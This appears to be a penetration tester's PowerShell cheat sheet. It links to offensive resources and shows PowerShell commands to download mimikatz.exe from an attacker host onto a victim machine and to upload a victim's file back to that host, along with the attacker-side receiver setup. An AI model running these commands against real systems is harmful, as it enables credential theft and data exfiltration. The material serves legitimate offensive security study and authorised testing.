PowerShell

https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Powershell%20-%20Cheatsheet.md
https://github.com/AlessandroZ/LaZagne
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Version

# Get PS version
Get-Host | Select-Object Version

# Alternatively, type $PSVersionTable and hit the Enter key
$PSVersionTable

Files

Read

powershell Get-Content "../bla.php"

Download

Attacker ==> Victim

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://4.3.2.1/Win32/mimikatz.exe', 'mimikatz.exe')"

Upload

Victim ==> Attacker

# Attacker side
cd $(mktemp -d) && git clone https://gitlab.com/charles.gargasson/PostDL .
sudo python3 postdl.py --ip 0.0.0.0 --port 80

# Upload from Victim
powershell -c "(New-Object System.Net.WebClient).UploadFile('http://4.3.2.1/','C:\Users\BOB\Pictures\xyz.jpg')"